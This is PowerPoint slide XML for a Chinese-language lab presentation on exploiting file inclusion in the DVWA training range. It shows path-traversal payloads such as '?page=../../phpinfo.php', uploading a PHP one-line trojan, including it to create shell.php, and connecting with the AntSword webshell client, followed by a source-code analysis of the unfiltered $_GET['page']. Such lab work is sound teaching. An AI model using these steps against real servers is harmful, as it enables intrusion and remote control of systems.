              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>靶场环境进行漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829435" y="2332355"/>
            <a:ext cx="7904480" cy="4525645"/>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3" name="文本框 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232977" y="3290442"/>
            <a:ext cx="7649845" cy="1106805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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sql</a:t>
            </a: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注入</a:t>
            </a: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a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4497707" y="2357310"/>
            <a:ext cx="3088005" cy="617855"/>
            <a:chOff x="6683" y="5071"/>
            <a:chExt cx="4863" cy="973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6683" y="5071"/>
              <a:ext cx="4863" cy="973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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8" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7555" y="5098"/>
              <a:ext cx="3119" cy="919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <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rPr>
                <a:t>Part 01</a:t>
              </a:r>
              <a:endPar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1094740" y="1778635"/>
            <a:ext cx="7410450" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>点开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和其他的只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后面的发生了变化，因此可以得知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后的参数视为可控字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2345055" y="2485390"/>
            <a:ext cx="7264400" cy="4347210"/>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1070610" y="1783080"/>
            <a:ext cx="8202930" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件包含是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传参的方式获取文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>我们用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查看一下上下级目录，发现可以直接获取服务器文件路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561975" y="2797810"/>
            <a:ext cx="11452860" cy="3817620"/>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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040765" y="1706245"/>
            <a:ext cx="10001250" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?page=../../phpinfo.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的具体信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="893445" y="2371090"/>
            <a:ext cx="9761855" cy="4340225"/>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1070610" y="1783080"/>
            <a:ext cx="8202930" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>我们在桌面创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文档，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>里面尝试上传包含本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>成功输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件会解析运行。其他的只会原封不动的输出出来。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="268605" y="3044190"/>
            <a:ext cx="11361420" cy="3558540"/>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11938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990600" y="1783080"/>
            <a:ext cx="8202930" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件上传一句话木马，进入文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，进行木马文件上传，改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件后缀为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，将其上传，并复制下路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="810895" y="2489835"/>
            <a:ext cx="10248900" cy="419862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11938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990600" y="1783080"/>
            <a:ext cx="8202930" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>复制链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../hackable/uploads/pp.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>到文件包含，发现没有报错，文件解析成功</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="681355" y="2647315"/>
            <a:ext cx="10995660" cy="400050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11938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990600" y="1783080"/>
            <a:ext cx="8202930" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>根据路径到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的文件包括目录，发现生成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2339340"/>
            <a:ext cx="10119360" cy="4267200"/>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119380" y="0"/>
            <a:ext cx="12192000" cy="6883400"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="19200"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4</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、漏洞利用</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实践</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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1783080"/>
            <a:ext cx="8202930" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>打开蚁剑，添加链接，把地址带有木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的链接复制过来，密码就是我们木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>里面写的的密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，直接连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070610" y="2647315"/>
            <a:ext cx="9715500" cy="405384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635" y="0"/>
            <a:ext cx="15113635" cy="6883400"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23801" cy="1084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4602" y="41"/>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64" name="文本框 63" hidden="1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4225925" y="549910"/>
            <a:ext cx="3748405" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <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rPr>
              <a:t>请输入您的主标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
              <a:ln w="101600">
                <a:solidFill>
                  <a:srgbClr val="02359C"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="02359C"/>
              </a:solidFill>
              <a:latin typeface="YouSheBiaoTiHei" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="YouSheBiaoTiHei" panose="00000500000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481965" y="980440"/>
            <a:ext cx="4766945"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5</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、漏洞源码</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分析</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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7285355" y="1931035"/>
            <a:ext cx="4064000" cy="3046095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码中使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $_GET['page'] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数来决定需要包含哪个文件，并且没有对该参数进行任何过滤或验证。攻击者可以通过操控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
